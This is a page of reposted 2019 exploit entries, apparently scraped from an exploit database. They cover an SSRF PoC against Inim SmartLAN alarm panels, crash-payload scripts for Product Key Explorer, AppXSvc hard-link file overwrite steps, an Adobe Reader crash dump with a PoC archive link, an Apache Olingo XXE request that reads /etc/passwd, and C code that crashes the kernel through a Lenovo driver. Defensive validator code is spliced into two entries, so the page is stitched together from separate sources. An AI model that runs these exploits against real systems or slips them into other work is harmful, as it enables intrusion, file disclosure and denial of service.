All posts by ISHACK AI BOT

  1. # Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery
     # Author: LiquidWorm
     # Date: 2019-12-09
     # Product web page: https://www.inim.biz
     # Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
     # Version: 6.x
     # Advisory ID: ZSL-2019-5545
     # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php

     Inim Electronics Smartliving SmartLAN/G/SI <=6.x Unauthenticated SSRF

     Vendor: INIM Electronics s.r.l.
     Product web page: https://www.inim.biz
     Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?

     Affected version: <=6.x

     Affected models: SmartLiving 505
                      SmartLiving 515
                      SmartLiving 1050, SmartLiving 1050/G3
                      SmartLiving 10100L, SmartLiving10100L/G3

     Summary: SmartLiving anti-intrusion control panel and security system provides important features rarely found in residential, commercial or industrial application systems of its kind. This optimized-performance control panel provides first-rate features such as: graphic display, text-to-speech, voice notifier, flexible hardware, end-to-end voice transmission (voice-on-bus), IP connectivity.

     SMARTLAN/SI: The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point networking capability and fast connectivity to the Internet. Therefore, it is possible to set up a remote connection and program or control the system via the SmartLeague software application. In effect, the SmartLAN/SI board grants the same level of access to the system as a local RS232 connection.

     SMARTLAN/G: The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides advanced remote-access and communication functions. The SmartLAN/G board is capable of sending event-related e-mails automatically. Each e-mail can be associated with a subject, an attachment and a text message. The attachment can be of any kind and is saved to an SD card. The message text can contain direct links to domains or IP addressable devices, such as security cameras. In addition to e-mails, the SmartLAN/G board offers users global access to their control panels via any Internet browser accessed through a PC, PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of distinguishing the means of connection and as a result provides an appropriate web-page for the tool in use. Smartphones can control the system in much the same way as a household keypad, from inside the house or from any part of the world.

     Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the SmartLiving SmartLAN within the GetImage functionality. The application parses user supplied data in the GET parameter 'host' to construct an image request to the service through onvif.cgi. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application.

     Tested on: GNU/Linux 3.2.1 armv5tejl
                Boa/0.94.14rc21
                BusyBox v1.20.2

     Vulnerability discovered by Sipke Mellema
                                 @zeroscience

     Advisory ID: ZSL-2019-5545
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php

     PoC:

     curl http://192.168.1.17/cgi-bin/onvif.cgi -X POST -d"mod=GetImage&host=http://127.0.0.1:23&par=2"
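The advisory's root cause is that the 'host' value reaches the image fetch with no validation. The following is an added example, not code from the advisory or from Inim, of the check a GetImage-style handler should perform before issuing any outbound request: an allowlist of camera hostnames, rejection of IP literals that are not globally routable (loopback, RFC 1918, link-local, unspecified), and a restricted scheme and port set. The allowlist entries, the port set and the sample URLs are constructed for this demonstration; the rejected value http://127.0.0.1:23 is the one from the advisory's PoC.

```python
"""Allowlist validation for a user-supplied image 'host' URL (added example)."""
import ipaddress
from urllib.parse import urlsplit

# Constructed allowlist: the only cameras this controller is allowed to contact.
ALLOWED_CAMERA_HOSTS = {"cam1.example.internal", "cam2.example.internal"}
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443, 8080}


def validate_image_host(raw):
    """Return (True, "ok") if `raw` may be fetched, else (False, reason).

    Checks run in an order that reports the most security-relevant failure
    first: scheme, embedded credentials, host presence, address class,
    allowlist membership, then port.
    """
    try:
        parts = urlsplit(raw)
    except ValueError:
        return False, "unparseable URL"

    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"

    # user:pass@host forms are a classic way to make a URL look allowlisted
    # while pointing somewhere else; refuse them outright.
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"

    host = parts.hostname or ""   # already lowercased and bracket-stripped
    if not host:
        return False, "empty host"

    # IP literals: refuse anything that is not globally routable
    # (127.0.0.1, 10/8, 169.254/16 metadata ranges, ::1, 0.0.0.0, ...).
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None          # not a dotted/colon literal, treat as a name
    if ip is not None and not ip.is_global:
        return False, "non-global address"

    # Decimal, octal or hex spellings of an address ("2130706433", "0x7f.1")
    # are not valid ip_address() input, so they fall through to the
    # allowlist and are rejected there.
    if host not in ALLOWED_CAMERA_HOSTS:
        return False, "host not on allowlist"

    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port is None:
        port = 443 if parts.scheme.lower() == "https" else 80
    if port not in ALLOWED_PORTS:
        return False, "port %d not allowed" % port

    return True, "ok"


if __name__ == "__main__":
    for url in ("http://127.0.0.1:23", "http://cam1.example.internal/snapshot.jpg",
                "http://169.254.169.254/latest/meta-data/", "http://[::1]/"):
        print(url, "->", validate_image_host(url))
```

Two caveats that the check above does not cover on its own: an allowlisted name must still be resolved and the resulting address re-checked at connect time (DNS rebinding), and the HTTP client used for the fetch must not follow redirects, otherwise an allowlisted camera that answers with a 302 to an internal address defeats the allowlist.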
  2. # Exploit Title: Product Key Explorer 4.2.0.0 - 'Name' Denial of Service (POC)
     # Discovery by: SajjadBnd
     # Date: 2019-12-10
     # Vendor Homepage: http://www.nsauditor.com
     # Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
     # Tested Version: 4.2.0.0
     # Vulnerability Type: Denial of Service (DoS) Local
     # Tested on OS: Windows 10 - Pro

     # [ About App ]
     # Find product keys for over +9000 most popular programs: Windows 8.1, Windows 8, Windows 7, Vista,
     # Windows 10, Microsoft Office, Adobe CS6, CS5, CS4 and CS3, Norton, Electronic Arts games, WinZip, Nero and more...
     # Visit "Features" page to see all supported software list of programs with which product key finder works.
     # Product Key Finder | Best Product Key Finder Software
     # The Best Product Key Find and Recovery Software
     # Product key Explorer recovers product keys for software installed on your
     # local and network computers, allows track the number of software licenses installed in your business.
     # With Product Key Explorer you can recover lost product keys for all major software programs, prevent losing your investment and money!
     # You can save product keys as Tab Delimited Txt File (.txt), Excel Workbook (.xls), CSV Comma Delimited (.csv),
     # Access Database (.mdb), SQLLite3 Database, Web Page (.html) or XML Data (.xml) file, Print or Copy to Clipboard.

     # [ POC ]
     # 1. Run the python script, it will create a new file "dos.txt"
     # 2. Run Product Key Explorer and click on "Register -> Enter Registration Code"
     # 3. Paste the content of dos.txt into the Field: 'Name'
     # 4. Click 'ok'
     # 5. Crashed ;)

     #!/usr/bin/env python
     # Builds a 258-byte marker pattern (100 x 'A', 100 x 'B', 58 x 'C') and writes it to dos.txt
     buffer = "\x41" * 100
     buffer += "\x42" * 100
     buffer += "\x43" * 58

     try:
         f = open("dos.txt", "w")
         print("[+] Creating %s bytes DOS payload.." % len(buffer))
         f.write(buffer)
         f.close()
         print("[+] File created!")
     except IOError:
         print("File cannot be created")
  3. # Exploit Title: AppXSvc 17763 - Arbitrary File Overwrite (DoS)
     # Date: 2019-10-28
     # Exploit Author: Gabor Seljan
     # Vendor Homepage: https://www.microsoft.com/
     # Version: 17763.1.amd64fre.rs5_release.180914-1434
     # Tested on: Windows 10 Version 1809 for x64-based Systems
     # CVE: CVE-2019-1476

     # Summary:
     # AppXSvc improperly handles file hard links resulting in a low privileged user
     # being able to overwrite an arbitrary file leading to elevation of privilege.

     # Description:
     # An elevation of privilege vulnerability exists when the AppX Deployment Server
     # (AppXSvc) improperly handles file hard links. While researching CVE-2019-0841
     # originally reported by Nabeel Ahmed, I have found that AppXSvc can be forced
     # to overwrite an arbitrary file by deleting all registry data files before
     # creating the file hard link. As Nabeel Ahmed described in his write-up of
     # CVE-2019-0841, if the settings.dat file is corrupted it will be replaced with
     # the original settings.dat template. However, additional settings.dat.LOG1 and
     # settings.dat.LOG2 files are also created during the initialization process.
     # Substituting the settings.dat.LOG1 or the settings.dat.LOG2 file with a hard
     # link allows a low privileged user to overwrite an arbitrary file with registry
     # data or just simply empty it, respectively. A low privileged user could exploit
     # this vulnerability to cause denial of service by overwriting critical system
     # files.

     Steps to reproduce:

     1. Terminate Paint 3D processes.
     2. Delete settings.* files in Microsoft.MSPaint_8wekyb3d8bbwe\Settings folder.
     3. Create a hard link from settings.dat.LOG1 to C:\Windows\win.ini.
     4. Execute the start ms-paint: command to run Paint 3D.
     5. Terminate Paint 3D processes.

     Expected result:
     It isn't possible to overwrite a file not writable by a low privileged user.

     Observed result:
     C:\Windows\win.ini file is overwritten with registry data.

     References:
     https://github.com/sgabe/CVE-2019-1476
     https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1476
     https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841
  4. # Exploit Title: Product Key Explorer 4.2.0.0 - 'Key' Denial of Service (POC)
     # Discovery by: SajjadBnd
     # Date: 2019-12-10
     # Vendor Homepage: http://www.nsauditor.com
     # Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
     # Tested Version: 4.2.0.0
     # Vulnerability Type: Denial of Service (DoS) Local
     # Tested on OS: Windows 10 - Pro

     # [ About App ]
     # Find product keys for over +9000 most popular programs: Windows 8.1, Windows 8, Windows 7, Vista,
     # Windows 10, Microsoft Office, Adobe CS6, CS5, CS4 and CS3, Norton, Electronic Arts games, WinZip, Nero and more...
     # Visit "Features" page to see all supported software list of programs with which product key finder works.
     # Product Key Finder | Best Product Key Finder Software
     # The Best Product Key Find and Recovery Software
     # Product key Explorer recovers product keys for software installed on your
     # local and network computers, allows track the number of software licenses installed in your business.
     # With Product Key Explorer you can recover lost product keys for all major software programs, prevent losing your investment and money!
     # You can save product keys as Tab Delimited Txt File (.txt), Excel Workbook (.xls), CSV Comma Delimited (.csv),
     # Access Database (.mdb), SQLLite3 Database, Web Page (.html) or XML Data (.xml) file, Print or Copy to Clipboard.

     # [ POC ]
     # 1. Run the python script, it will create a new file "dos.txt"
     # 2. Run Product Key Explorer and click on "Register -> Enter Registration Code"
     # 3. Paste the content of dos.txt into the Field: 'Key'
     # 4. Click 'ok'
     # 5. Crashed ;)

     #!/usr/bin/env python
     # Builds a 258-byte marker pattern (100 x 'A', 100 x 'B', 58 x 'C') and writes it to dos.txt
     buffer = "\x41" * 100
     buffer += "\x42" * 100
     buffer += "\x43" * 58

     try:
         f = open("dos.txt", "w")
         print("[+] Creating %s bytes DOS payload.." % len(buffer))
         f.write(buffer)
         f.close()
         print("[+] File created!")
     except IOError:
         print("File cannot be created")
  5. We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:

     --- cut ---
     First chance exceptions are reported before any exception handling.
     This exception may be expected and handled.
     eax=707779e0 ebx=25876c38 ecx=052faab8 edx=707703a4 esi=707703d4 edi=25876e34
     eip=10e6c29e esp=052fa89c ebp=052fa8a4 iopl=0         nv up ei pl nz ac po nc
     cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210212
     CoolType!CTInit+0x3913e:
     10e6c29e 8902            mov     dword ptr [edx],eax  ds:002b:707703a4=31a03194

     0:000> u @eip-14
     CoolType!CTInit+0x3912a:
     10e6c28a 8b7d0c          mov     edi,dword ptr [ebp+0Ch]
     10e6c28d 8b571c          mov     edx,dword ptr [edi+1Ch]
     10e6c290 8b7720          mov     esi,dword ptr [edi+20h]
     10e6c293 035508          add     edx,dword ptr [ebp+8]
     10e6c296 8b4724          mov     eax,dword ptr [edi+24h]
     10e6c299 037508          add     esi,dword ptr [ebp+8]
     10e6c29c 03c6            add     eax,esi
     10e6c29e 8902            mov     dword ptr [edx],eax

     0:000> ? poi(edi+1c)
     Evaluate expression: -690332 = fff57764

     0:000> ? poi(ebp+8)
     Evaluate expression: 1887538240 = 70818c40

     0:000> !heap -p -a 70818c40
         address 70818c40 found in
         _DPH_HEAP_ROOT @ bfc1000
         in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                     723d3b94:         70818c40            173c0 -         70818000            19000
               unknown!fillpattern
         0f32a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240
         77f24b26 ntdll!RtlDebugAllocateHeap+0x0000003c
         77e7e3e6 ntdll!RtlpAllocateHeap+0x000000f6
         77e7cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7
         77e7ccee ntdll!RtlAllocateHeap+0x0000003e
         0f48aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f
         77c2f1f6 ucrtbase!_malloc_base+0x00000026
         5fbefc39 AcroRd32!AcroWinMainSandbox+0x00003ec9
         10e37991 CoolType!CTInit+0x00004831
         10e38e1b CoolType!CTInit+0x00005cbb
         10e68870 CoolType!CTInit+0x00035710
         10e683dc CoolType!CTInit+0x0003527c
         10e67d25 CoolType!CTInit+0x00034bc5
         10e65902 CoolType!CTInit+0x000327a2
         10e633f2 CoolType!CTInit+0x00030292
         10e62719 CoolType!CTInit+0x0002f5b9
         10e620e8 CoolType!CTInit+0x0002ef88
         10e62000 CoolType!CTInit+0x0002eea0
         108f36f1 AGM!AGMInitialize+0x0002a881

     0:000> kb
      # ChildEBP RetAddr  Args to Child
     WARNING: Stack unwind information not available. Following frames may be wrong.
     00 052fa8a4 10e6bde2 70818c40 25876e34 70818c40 CoolType!CTInit+0x3913e
     01 052fa918 10e6bd06 052faab4 052fa9e4 00000001 CoolType!CTInit+0x38c82
     02 052fa930 10e6bce7 052faab4 052fa9e4 73330f68 CoolType!CTInit+0x38ba6
     03 052fa944 10e6bb4f 052faab4 052fa9e4 73330f68 CoolType!CTInit+0x38b87
     04 052fa968 10e6b8b0 052facd8 73330f68 110f7080 CoolType!CTInit+0x389ef
     05 052fab08 10e6abf9 73330f68 110f7080 052facd8 CoolType!CTInit+0x38750
     06 052fad64 10e65b0c 052fb054 052faddc 00000000 CoolType!CTInit+0x37a99
     07 052fb07c 10e633f2 000007c6 00000000 00000000 CoolType!CTInit+0x329ac
     08 052fb14c 10e62719 65babff0 00000001 052fb1dc CoolType!CTInit+0x30292
     09 052fb964 10e620e8 6aa0a9b4 052fb97c 6aa0a990 CoolType!CTInit+0x2f5b9
     0a 052fb9e4 10e62000 6aa0a9b4 6aa0a99c 73fdc4da CoolType!CTInit+0x2ef88
     0b 052fba24 108f36f1 7155bd90 6aa0a9b4 6aa0a99c CoolType!CTInit+0x2eea0
     0c 052fba38 108e023e 6aa0a99c 108e01d0 331cbd80 AGM!AGMInitialize+0x2a881
     0d 052fba4c 108df007 331cbd8c 10d84a18 00000001 AGM!AGMInitialize+0x173ce
     0e 052fba84 108f0bcc c1574612 1733a7d0 00000000 AGM!AGMInitialize+0x16197
     0f 052fbb4c 0f327c7a 0bfc16cc 052fbb78 0f3291ab AGM!AGMInitialize+0x27d5c
     --- cut ---

     Notes:

     - The crash looks very similar to the one reported in Issue #1891 in June 2019, and fixed in August 2019 as CVE-2019-8042. The stack trace and context are nearly identical. It is possible that this is an unfixed variant of the previous vulnerability.
     - Reproduces on Adobe Acrobat Reader DC (2019.012.20040) on Windows 10, with and without PageHeap enabled (more cleanly with PageHeap, though).
     - The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data at a negative offset relative to a heap allocation (-690332 in the above case).
     - Attached samples: poc[1-4].pdf (crashing files).

     Proof of Concept:
     https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47769.zip
  6. #############################################################
     #
     # COMPASS SECURITY ADVISORY
     # https://www.compass-security.com/research/advisories/
     #
     #############################################################
     #
     # Product:  Apache Olingo OData 4.0
     # Vendor:   Apache Foundation
     # CSNC ID:  CSNC-2009-025
     # CVE ID:   CVE-2019-17554
     # Subject:  XML External Entity Resolution (XXE)
     # Risk:     High
     # Effect:   Remotely exploitable
     # Author:   Archibald Haddock ([email protected])
     # Date:     08.11.2019
     #
     #############################################################

     Introduction:
     -------------
     Apache Olingo is a Java library that implements the Open Data Protocol (OData). [1]

     XML data is parsed by insecurely configured software components, which can be abused for XML External Entity Attacks [2].

     Affected:
     ---------
     Vulnerable:
      * Olingo OData 4.x.x to 4.6.x

     Not vulnerable:
      * Olingo OData 4.7.0
      * The Olingo OData 2.0 implementation has XXE protection since 1.1.0-RC01

     Technical Description
     ---------------------
     The XML content type entity deserializer is not configured to deny the resolution of external entities. Requests with content type "application/xml", which trigger the deserialization of entities, can be used to trigger XXE attacks.

     Request
     =======

     POST /odata-server-sample/cars.svc/Cars HTTP/1.1
     Host: localhost:8081
     User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Connection: close
     Referer: http://localhost:8081/odata-server-sample/
     Cookie: JSESSIONID=17C3158153CDC2CA1DBA0E77D4AFC3B0
     Upgrade-Insecure-Requests: 1
     content-type: application/xml
     Content-Length: 1101

     <?xml version="1.0" encoding="UTF-8"?>
     <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
     <a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars/$entity">
       <a:id>Cars(1)</a:id>
       <a:title></a:title>
       <a:summary></a:summary>
       <a:updated>2019-11-08T15:10:30Z</a:updated>
       <a:author>
         <a:name></a:name>
       </a:author>
       <a:link rel="edit" href="Cars(1)"></a:link>
       <a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link>
       <a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category>
       <a:content type="application/xml">
         <m:properties>
           <d:Id m:type="Int16">1</d:Id>
           <d:Model>F1 &xxe;</d:Model>
           <d:ModelYear>2012</d:ModelYear>
           <d:Price m:type="Decimal">189189.43</d:Price>
           <d:Currency>EUR</d:Currency>
         </m:properties>
       </a:content>
     </a:entry>

     Response
     ========

     HTTP/1.1 201 Created
     Server: Apache-Coyote/1.1
     OData-Version: 4.0
     Content-Type: application/xml
     Content-Length: 960
     Date: Fri, 08 Nov 2019 14:22:35 GMT
     Connection: close

     <?xml version="1.0" encoding="UTF-8"?><a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars"><a:id>Cars(1)</a:id><a:title></a:title><a:summary></a:summary><a:updated>2019-11-08T15:22:35Z</a:updated><a:author><a:name></a:name></a:author><a:link rel="edit" href="Cars(1)"></a:link><a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link><a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category><a:content type="application/xml"><m:properties><d:Id m:type="Int16">1</d:Id><d:Model> myuser:x:1000:1000:,,,:/home/myuser:/bin/bash </d:Model><d:ModelYear>2012</d:ModelYear><d:Price m:type="Decimal">189189.43</d:Price><d:Currency>EUR</d:Currency></m:properties></a:content></a:entry>

     Workaround / Fix:
     -----------------
     Configure the XML reader securely [3].

     In org.apache.olingo.server.core.deserializer.xml.ODataXmlDeserializer.java on line 70 a javax.xml.stream.XMLInputFactory is instantiated:

         private static final XMLInputFactory FACTORY = XMLInputFactory.newFactory();

     The XMLInputFactory should be configured not to resolve external entities:

         FACTORY.setProperty(XMLInputFactory.SUPPORT_DTD, false);
         FACTORY.setProperty("javax.xml.stream.isSupportingExternalEntities", false);

     Timeline:
     ---------
     2019-11-08: Discovery by Compass Security
     2019-11-08: Initial vendor notification
     2019-11-08: Initial vendor response
     2019-12-04: Release of fixed Version / Patch [4]
     2019-12-05: Coordinated public disclosure date

     [1] https://olingo.apache.org/
     [2] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
     [3] https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
     [4] https://mail-archives.apache.org/mod_mbox/olingo-user/201912.mbox/%3CCAGSZ4d7Ty%3DL-n_iAzT6vcQp65BY29XZDS5tMoM8MdDrb1moM7A%40mail.gmail.com%3E

     Source: https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2019-025_apache_xxe.txt
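The advisory's fix is the two XMLInputFactory properties shown above, which disable DTD processing in Olingo's own parser. As defence in depth when the parser configuration is not under your control (a reverse proxy, a gateway, or a service that merely forwards the body), the same property can be enforced at the request boundary: reject any body that declares a DOCTYPE or ENTITY before it reaches a parser. The following is an added example in Python, not code from the advisory or from Apache Olingo; it uses the Atom and OData namespaces from the advisory's request, and the two sample bodies are constructed after that request (one without the DTD, one with it).

```python
"""Pre-parse DTD rejection for XML request bodies, plus extraction of the
Atom entry's OData properties (added example, not Olingo's own code)."""
import re
import xml.etree.ElementTree as ET

# Namespaces used in the advisory's request.
NS = {
    "a": "http://www.w3.org/2005/Atom",
    "m": "http://docs.oasis-open.org/odata/ns/metadata",
    "d": "http://docs.oasis-open.org/odata/ns/data",
}

# XML 1.0 spells these keywords exactly like this; the IGNORECASE flag only
# guards against parsers that are lenient about case.
DTD_RE = re.compile(r"<!(?:DOCTYPE|ENTITY)", re.IGNORECASE)

# Constructed body modelled on the advisory's request, without the DTD.
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<a:entry xmlns:a="http://www.w3.org/2005/Atom"
         xmlns:m="http://docs.oasis-open.org/odata/ns/metadata"
         xmlns:d="http://docs.oasis-open.org/odata/ns/data">
  <a:id>Cars(1)</a:id>
  <a:content type="application/xml">
    <m:properties>
      <d:Id m:type="Int16">1</d:Id>
      <d:Model>F1</d:Model>
      <d:ModelYear>2012</d:ModelYear>
      <d:Price m:type="Decimal">189189.43</d:Price>
      <d:Currency>EUR</d:Currency>
    </m:properties>
  </a:content>
</a:entry>"""

# Same body with the advisory's external-entity declaration and reference added.
XXE = BENIGN.replace(
    b"?>\n<a:entry",
    b'?>\n<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>\n<a:entry', 1,
).replace(b"<d:Model>F1</d:Model>", b"<d:Model>F1 &xxe;</d:Model>", 1)


def handle_request(body):
    """Return (True, {property: value}) for an acceptable Atom entry,
    otherwise (False, reason). Never hands a body with a DTD to the parser."""
    # XML 1.0 forbids NUL characters; their presence usually means a UTF-16
    # body that a byte/str regex for "<!DOCTYPE" would not see.
    if b"\x00" in body:
        return False, "NUL byte in body"
    try:
        text = body.decode("utf-8")
    except UnicodeDecodeError:
        return False, "body is not UTF-8"
    if DTD_RE.search(text):
        return False, "DTD or entity declaration not allowed"
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return False, "malformed XML: %s" % exc
    props = root.find("a:content/m:properties", NS)
    if props is None:
        return False, "no m:properties element"
    # Strip the "{namespace}" prefix from each property tag.
    return True, {child.tag.rsplit("}", 1)[-1]: (child.text or "") for child in props}


if __name__ == "__main__":
    print(handle_request(BENIGN))
    print(handle_request(XXE))
```

The check fails closed: a `<!DOCTYPE` inside a CDATA section or comment is also rejected, which is the right trade-off for an API that never legitimately sends a DTD. It does not replace the parser fix, since a parser that still resolves external entities remains exploitable through any other path that feeds it XML.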
  7. # Exploit Title: Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)
     # Date: 2019-12-11
     # Exploit Author: Nassim Asrir
     # CVE: CVE-2019-6192
     # Tested On: Windows 10(64bit) | ThinkPad T470p
     # Vendor : https://www.lenovo.com/us/en/
     # Ref : https://support.lenovo.com/us/fr/solutions/len-29334

     # Description
     # A vulnerability in pmdrvs.sys driver has been discovered in Lenovo Power Management Driver
     # The vulnerability exists due to insufficient input buffer validation when the driver processes IOCTL codes
     # Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space.

     # Exploit

     #include <windows.h>
     #include <stdio.h>
     #include <conio.h>

     int main(int argc, char **argv)
     {
         HANDLE hDevice;
         DWORD bret;
         char szDevice[] = "\\\\.\\pmdrvs";

         printf("--[ Lenovo Power Management Driver pmdrvs.sys Denial Of Service ]--\n");
         printf("Opening handle to driver..\n");

         if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, NULL)) != INVALID_HANDLE_VALUE) {
             printf("Device %s successfully opened!\n", szDevice);
             printf("\tHandle: %p\n", hDevice);
         } else {
             printf("Error: Error opening device %s\n", szDevice);
             return 1; /* no device handle, nothing to send */
         }

         printf("\nPress any key to DoS..");
         _getch();

         /* Zero-length buffers with a bogus user pointer; the driver dereferences
            its input without checking the supplied length. */
         bret = 0;
         if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL)) {
             printf("DeviceIoControl Error - bytes returned %#x\n", bret);
         }

         CloseHandle(hDevice);
         return 0;
     }

     # RCA

     2: kd> !analyze -v
     *******************************************************************************
     *                                                                             *
     *                        Bugcheck Analysis                                    *
     *                                                                             *
     *******************************************************************************

     SYSTEM_SERVICE_EXCEPTION (3b)
     An exception happened while executing a system service routine.
     Arguments:
     Arg1: 00000000c0000005, Exception code that caused the bugcheck
     Arg2: fffff80428bf109d, Address of the instruction which caused the bugcheck
     Arg3: ffffc709dee8ec50, Address of the context record for the exception that caused the bugcheck
     Arg4: 0000000000000000, zero.

     FAULTING_IP:
     pmdrvs+109d
     fffff804`28bf109d 8b07            mov     eax,dword ptr [rdi]

     CONTEXT:  ffffc709dee8ec50 -- (.cxr 0xffffc709dee8ec50)
     rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
     rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000
     rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290
      r8=000000000000000e  r9=ffffca04c1ca8d40 r10=fffff80428bf5020
     r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
     r14=0000000000000002 r15=0000000000000000
     iopl=0         nv up ei pl zr na po nc
     cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
     pmdrvs+0x109d:
     fffff804`28bf109d 8b07            mov     eax,dword ptr [rdi] ds:002b:00000000`00000000=????????
     Resetting default scope

     CPU_COUNT: 8
     CPU_MHZ: af8
     CPU_VENDOR: GenuineIntel
     CPU_FAMILY: 6
     CPU_MODEL: 9e
     CPU_STEPPING: 9
     CPU_MICROCODE: 0,0,0,0 (F,M,S,R)  SIG: 8E'00000000 (cache) 0'00000000 (init)
     BLACKBOXBSD: 1 (!blackboxbsd)
     BLACKBOXPNP: 1 (!blackboxpnp)
     CURRENT_IRQL: 0
     ANALYSIS_SESSION_HOST: LAPTOP-SP
     ANALYSIS_SESSION_TIME: 09-30-2019 20:29:54.0485
     ANALYSIS_VERSION: 10.0.17763.132 amd64fre
     LAST_CONTROL_TRANSFER: from fffff80428bf5060 to fffff80428bf109d

     STACK_TEXT:
     ffffc709`dee8f640 fffff804`28bf5060 : 00000000`00000000 ffff9980`05b00099 00000000`00000000 00000000`00000000 : pmdrvs+0x109d
     ffffc709`dee8f6c0 fffff804`1f12dba9 : ffffca04`ca8f80a0 fffff804`1f6d6224 ffffca04`cc51ff20 00000000`00000000 : pmdrvs+0x5060
     ffffc709`dee8f6f0 fffff804`1f6abb11 : ffffc709`dee8fa80 ffffca04`ca8f80a0 00000000`00000001 ffffca04`cc188290 : nt!IofCallDriver+0x59
     ffffc709`dee8f730 fffff804`1f6d763c : ffffca04`00000000 ffffca04`cc188290 ffffc709`dee8fa80 ffffc709`dee8fa80 : nt!NtQueryInformationFile+0x1071
     ffffc709`dee8f7e0 fffff804`1f64c356 : 00007fff`2fd66712 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtClose+0xffc
     ffffc709`dee8f920 fffff804`1f27a305 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtDeviceIoControlFile+0x56
     ffffc709`dee8f990 00007fff`33aaf844 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!setjmpex+0x7925
     00000000`0068fcf8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007fff`33aaf844

     THREAD_SHA1_HASH_MOD_FUNC: fea423dc9c9c08c703f6d9d5b0d8f7062b0ece68
     THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 4653d18777ce51b05029c753677fc2c05d5811bb
     THREAD_SHA1_HASH_MOD: c2a3dbda00dbcf5ade5303449052a7349d5c580b

     FOLLOWUP_IP:
     pmdrvs+109d
     fffff804`28bf109d 8b07            mov     eax,dword ptr [rdi]

     FAULT_INSTR_CODE: 8941078b
     SYMBOL_STACK_INDEX: 0
     FOLLOWUP_NAME: MachineOwner
     STACK_COMMAND: .cxr 0xffffc709dee8ec50 ; kb
     BUGCHECK_STR: 2E8B5A19
     EXCEPTION_CODE_STR: 2E8B5A19
     EXCEPTION_STR: WRONG_SYMBOLS
     PROCESS_NAME: ntoskrnl.wrong.symbols.exe
     IMAGE_NAME: ntoskrnl.wrong.symbols.exe
     MODULE_NAME: nt_wrong_symbols
     SYMBOL_NAME: nt_wrong_symbols!2E8B5A19A70000
